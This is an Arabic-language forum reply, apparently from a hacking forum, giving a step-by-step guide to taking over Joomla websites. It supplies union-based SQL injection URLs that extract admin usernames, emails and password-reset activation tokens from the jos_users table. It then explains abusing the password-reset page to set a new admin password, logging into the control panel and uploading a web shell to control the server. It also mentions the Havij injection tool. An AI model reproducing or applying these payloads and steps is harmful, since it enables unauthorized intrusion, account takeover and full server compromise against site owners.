صباح النور ياغالي ..
شوف اخي اغالب الاوقات بستخدم الامر group_concat لـ إظهار جميع الجداول ويفضل استخدامه بدل من امر limit
لكــن اذا لم تظهر معاك كافه الجداول باالأمر group_concat تستطيع تخطي هذهـ المشكله ااما عن طريق حقن الموقع بـ برنامج havij او انك تستخدم امر limit وتبدأ تزود بالارقام الين توصل لـ جدول اليوزر ..... 
لكـن شوف بالنسبه لـ سكربت جوملا اذا كان مصاب يمكنـكـ تخطــــــــــــيه.
اولا تذهب للحقنه بعد استخراج الاعمدة المصابه إذهب الى اي عمود ..
وإكتب في العمود المصاب مثلا هذاالعمود المصاب رقم 4 .
[align=left]http://wwww.nano.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8--[/align]
لنفترض طلع لك العمود المصاب رقم [ 4 ].......
تكتب فيه كذا .
[align=left]http://wwww.nano.com/index.php?id=-1+union+select+1,2,3,concat(username,0x3a.email),5 ,6,7,8+from+jos_users--[/align]
لو تلاحظ ياغالي اني كتبت اسم اليورز نيم لان معروف سكربت جوملا اسم جدول اليوزر نيم هو username والايميل هو email
واضفت بـ نهاية الرابط jos_users ؛؛< هاي الي يوجد بها اليوزر والباسورد ..
طيب الحين تمام لما تضغط انتر راح يطلع لك اليوزر نيم والايميل .. تمام ..
الان هذا رابط الموقع المصاب ..:
http://wwww.nano.com
ضع خلفهـ .هذا الرابط .:
index.php?option=com_user&view=reset
الان راح تجيك صفحه وراح يقولك ادخل الايميل انت خذ الايميل الي استخرجته من الحقنه وضعه في الصفحه هذهـ ..
تمام بعد ماتضع الايميل راح يقول لك ادخل الـ activation مع اسم اليوز نيم تبع صاحب الموقع ..
طيب كيف نستخرج الـ activation ؟؟
راح اقولك كيف اذهب الى الحقنه .:
[align=left]http://wwww.nano.com/index.php?id=-1+union+select+1,2,3,concat(username,0x3a.email),5 ,6,7,8+from+jos_users--[/align]
امسسح كلمــة email وضع مكانها كلمــه activation راح يكون هكذا شكل الرابط .:
[align=left]http://wwww.nano.com/index.php?id=-1+union+select+1,2,3,concat(username,0x3a.activati on),5,6,7,8+from+jos_users--[/align]
تمام الان اضغط إنتر <<<<<<<<< وراح تشوف رقم الـ activation امامكـ.
سوي له كوبي نسخ وضعـــه في تلك الصفحــه الي فوق التي تطلب الـ activation .. وضع اليوزر نيم تبع الادمن الذي طلع لنا مع الحقنه ..
واضغط موافق وراح يقولك [ أدخل الباسورد الجديد واعد تكرارهـ ].< وانت ادخل اي باسورد في راسك وكرره مره ثانيــة ...
وبعدها اذهب الى لوحه التحكم تبع الادمن وادخل اليوزر نيم تبع الادمن والباسورد الجديد الي سويته انت . ومبروك عليك الموقع وراح تفتح لك لوحه التحكم اذهب وارفع شل وتحكم في السيرفر كامل .
ملاحظـــة \ هذه الطريقـة تنفع فقط لـ سكربت جوملا joomla لان بعض الاحيان لما تستخرج الباسورد في الحقنه يكون مشفر md5 ولا تستطيع فكـــــــــه وبهذه الطريقه يكون تخطينا الباسورد ..
إن شاء الله وصلت المعلومـة لك ياغالي ..
بالتوفيق لك ..